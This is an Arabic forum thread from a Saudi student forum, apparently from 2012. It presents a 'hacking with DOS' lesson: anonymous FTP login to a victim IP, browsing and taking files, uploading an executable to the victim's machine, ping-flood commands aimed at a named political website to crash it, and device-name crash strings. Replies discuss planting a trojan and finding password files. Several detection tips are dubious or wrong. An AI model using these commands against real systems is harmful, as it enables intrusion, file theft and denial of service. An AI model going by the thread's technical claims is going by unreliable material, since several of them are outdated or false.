مشاهدة : 2351
صفحة 1 من 3 123 الأخيرةالأخيرة
النتائج 1 إلى 8 من 22

الإختراق بالدوس

هذي مو دورة إختراق وإنما درس .. تعلمته وحبيت أفيد المنتدى فيه . يظبط ببعض المواقع طبعا إختراق لاأجهزة عن طريق الموقع . ..

  1. #1
    صورة مشاغب الثانوية
    مشاغب الثانوية غير متصل مشرف قدير سابق
    تاريخ التسجيل
    Dec 2008
    الدولة
    الرياض
    المشاركات
    1,109
    Thanks
    0
    شكر 0 مرات في 0 مشاركات
    Rep Power
    42

    الإختراق بالدوس

    الإختراق بالدوس صور_الإختر


    الإختراق بالدوس صور_الإختر

    هذي مو دورة إختراق وإنما درس ..

    تعلمته وحبيت أفيد المنتدى فيه .

    يظبط ببعض المواقع طبعا إختراق لاأجهزة عن طريق الموقع .
    ..

    بعضها يا جماعة الخير .. <<<<<<<<<الحين يجيني واحد ويجرب على مدرسة المشاغبين ..

    المهم ..

    نبدأ ,..

    إفتح الدوس ..

    طريقة فتح الدوس !

    إفتح إبدأ .. run إكتب cmd

    مبرووك ..


    فتحت الدوس .

    ملاحظة (نظام دوس مختلف عن نظام الويندوز ) بس نظام الويندوز قائم على نظام الدوس

    إكتب الأمر التالي .

    ftp -n

    بعدين .
    نكتب
    open

    بعدين

    IP الضحية

    عحسب اللي بيجيك نكمل ..

    أحيانا يقلك ما شبك على البورت 23 ..انت ترجع تكتب open

    بس جنبها 21

    لإنو هذا بورت نقل الملفات .


    طيب

    لازم يطلع لك
    connect to IP
    220 websrv1 Microsoft FTP Service (Version 4.0).


    حلو بعدين ؟
    إكتب
    quote user ftp
    انت تابع إيش قاعد برد عليك الملقم

    331 Anonymous acces allowed, send identify (e-mail name) as password.

    كويس ..

    نتابع

    quote cwd ~root

    لازم يكتب

    530 Please login with USER and PASS

    بعدين انت إكتب
    quote pass ftp

    لازم يكتب

    230 Anonymous user logged in.

    مبروك أهنيك دخلت

    هذي أوامر تفيدك

    Pwd
    لكي تعرف ما يحتويه الهارد ديسك
    Cd
    لإقتحام مجلد مثال
    Cd black
    في هدا المثال قمت بإقتحام مجلد المسمى بلاك
    Ls
    لكي يتضح لك محتوى المجلد أو الهارد ديسك
    Get
    لكي تحمل الى سطح المكتب من جهازك
    مثال
    Get black.exe
    Put
    العملية الع**ية ل
    Get
    يعني ان تأخد ملف من سطح المكتب من جهازك و تضعه في
    في جهاز الضحية
    مثال
    Put black.exe
    Clos
    لقطع الإتصال مع الضحية


    ملاحظة :

    في أوامر ما ذكرتها ..

    روح على الدوس .. وإكتب
    ftp
    بعدين
    help

    ملاحظات مهمة

    1-أكتب الأمرmsconfig لمعرفة البرامج اللتي تعمل وقت التشغيل او عند بدء التشغيل ولتتجنب الاختراق يمكنك عن طريق هذا الامر ثم إذهب إلى بدء التشغيل وانظر الى البرامج العامله وقم باطفاء أي برنامج غريب يعمل عند بدء التشغيل.
    2- الأمر Control لفتح لوحة التحكم .
    3- الأمر telnet لفتح نافذة التلنت والاتصال بجهاز بعيد بمعرفة الاي بي والبورت.
    4- الأمر ping http://www.israel.org/ لمعرفة IP الموقع ويستعمل في الهجوم ضد الموقع. ملاحظه/هناك مسافه بين ping http. يمكنك تغير (israel.org) بأي موقع.
    5- الأمر ping -twww.israel.org لارسال رسايل تتسبب في انهيار الموقع عند اجتماع الكثير من المستخدمين على القيام بها ضد موقع معين .
    6- الأمر netstat -n لاظهار IP أي شخص انت ترسل له ملف عبر الماسنجر اكتب هذا الامر بينما انت ترسل وسيظهر IP تبعه في موجة الدوس والاي بي تبعك انت ايضا.
    7- الأمر winipcfg لمعرفة IP الخاص بك.
    8- الأمر System.ini انظر الى السطر السادس ولابد ان يكون هكذا user.exe=user.exe والا فجهازك مخترق
    9- الأمر regedit ثم اتبع الاتي

    HKEY_LOCAL_MACHINE>SOFTWARE>Microsoft>Windows>Curr entVersion>Run واي ملف يحمل امتداد exe واسمه name قم بحذفه فهو الباتش تقريبا .

    ---------------------------------------------------------------------

    اما بخصوص بينق تدمير المواقع فهي كالتالي:-
    1- ping http://www.israel.org/ لمعرفة IP الموقع.
    2- ping -t http://www.israel.org/ يحمل الضغط على الموقع المستضيف.
    3- ping -t -a -f http://www.israel.org/ يقوم بإعطاء أوامر إلى المستضيف.
    4- ping -w timeout http://www.israel.org/ قوم بتوضيح سرعة الموقع الحالية.

    ---------------------------------------------------------------------

    10- كيف تستخدم اوامر الدوس في بعض الهجوم
    con/con.wav
    com1/com1.wav
    com2/com2.wav


    مايستطيع فعله netstat

    ==============================================

    NETSTAT حالة الشبكة يظهر جميع المنافذ المتصلة
    NETSTAT مسافة-A يظهر ارقام الايبي المتصلة وحالتها
    NETSTAT مسافة-E يظهر حالة الشبكة بشكل عام
    NETSTAT مسافة-N يظهر ارقام البورتات والايبيات المتصلة
    NETSTAT مسافة-P يظهر البروتوكولات المتصلة بجهازك
    NETSTAT مسافة-R يظهر اجهزة الروترز في شبكتك
    NETSTAT مسافة-S يظهر حالة الشبكة والاجهزة المتصلة

    _____________


    أعتذر على عدم الترتيب . بس والله ضغط دراسة واختبارت وإلخ ...

    أرجو الدعاء لي بالتوفيق





    تخياتي مشاغب الثانوية
    التعديل الأخير تم بواسطة مشاغب الثانوية ; 13-05-2012 الساعة 10:48 PM

  2. #2
    صورة krisby174
    krisby174 غير متصل طالب ابتدائي
    تاريخ التسجيل
    May 2012
    الدولة
    مصر - الاسكندرية
    المشاركات
    66
    Thanks
    0
    شكر 0 مرات في 0 مشاركات
    Rep Power
    3

    رد: الإختراق بالدوس

    جميل يا مبدع بس انا ملقتش فى اللى قلت علية بالسطر السادس يعنى انا مخترق

    هل لانى بجرب تبليغ الباتش فى نفسى الاول ولا اية ساعدنى وشكرا على الموضوع انا حقراة من جديد كويس لانة مهم جدا

  3. #3
    صورة السيّد العلوي
    السيّد العلوي غير متصل مراقب قدير سابق
    تاريخ التسجيل
    Dec 2008
    الدولة
    مكة المكرمة - كدي
    المشاركات
    3,878
    Thanks
    0
    شكر 0 مرات في 0 مشاركات
    Rep Power
    150

    رد: الإختراق بالدوس

    ممبدع كالعادة يا غالي

    الف شكر على طرحك المميزة

  4. #4
    صورة مشاغب الثانوية
    مشاغب الثانوية غير متصل مشرف قدير سابق
    تاريخ التسجيل
    Dec 2008
    الدولة
    الرياض
    المشاركات
    1,109
    Thanks
    0
    شكر 0 مرات في 0 مشاركات
    Rep Power
    42

    رد: الإختراق بالدوس

    بخصوص أخي كرسبي ي سطر تقصد بالزبط !


    أما عبد الوهاب . .. عراسي والله نورت الموضوع والله

  5. #5
    صورة krisby174
    krisby174 غير متصل طالب ابتدائي
    تاريخ التسجيل
    May 2012
    الدولة
    مصر - الاسكندرية
    المشاركات
    66
    Thanks
    0
    شكر 0 مرات في 0 مشاركات
    Rep Power
    3

    رد: الإختراق بالدوس

    8- الأمر System.ini انظر الى السطر السادس ولابد ان يكون هكذا user.exe=user.exe والا فجهازك مخترق

  6. #6
    صورة مشاغب الثانوية
    مشاغب الثانوية غير متصل مشرف قدير سابق
    تاريخ التسجيل
    Dec 2008
    الدولة
    الرياض
    المشاركات
    1,109
    Thanks
    0
    شكر 0 مرات في 0 مشاركات
    Rep Power
    42

    رد: الإختراق بالدوس

    نكتب الأمر في الدوس

    System.ini

    بيفتح لك مذكرة إقرأ السطر السادس أو السابع ..

    لازم يجبلك ..
    user.exe=user.exe

    user

    إسم الجهاز يعني .. أحيانا يزيد أرقام من عنده .. ويعني مو أكيدة عفكرة يعني

    والأوامر هي موجودة بموضوع قديم بهذا المنتدى من عام 2008 وكاتب فيه تفصيل بكرة بجبلك ياه لإني نعسسسست ..

  7. #7
    صورة krisby174
    krisby174 غير متصل طالب ابتدائي
    تاريخ التسجيل
    May 2012
    الدولة
    مصر - الاسكندرية
    المشاركات
    66
    Thanks
    0
    شكر 0 مرات في 0 مشاركات
    Rep Power
    3

    رد: الإختراق بالدوس

    Ega80woa.fon=ega80woa.fon

    هى هى مش مهم تمام كدة

  8. #8
    صورة مشاغب الثانوية
    مشاغب الثانوية غير متصل مشرف قدير سابق
    تاريخ التسجيل
    Dec 2008
    الدولة
    الرياض
    المشاركات
    1,109
    Thanks
    0
    شكر 0 مرات في 0 مشاركات
    Rep Power
    42

    رد: الإختراق بالدوس

    تشغيل ثم اكتب الامر التالي
    System.ini
    ستفتح امامك مذكره وفيها كتابات انقليزية انت يهمك الآن من هذه المذكرة كلمة باسوورد ستجدها قريبا من اخر الصفحة
    كلمة باسوورد بالانقليزي وتحتها وندوز وامامه امتداد الملف الذي فيه الباسووردات التابعه لك او التابعه لكل من يستخدم الجهاز
    اذهب الى نفس الامتداد في الوندوز وستجده
    انت الآن في الخيار من امرك اما الحذف واما ان تبقي عليه

صفحة 1 من 3 123 الأخيرةالأخيرة
الدورات التدريبية جامعة نجران
يشرفنا اعجابك على فيس بوك facebook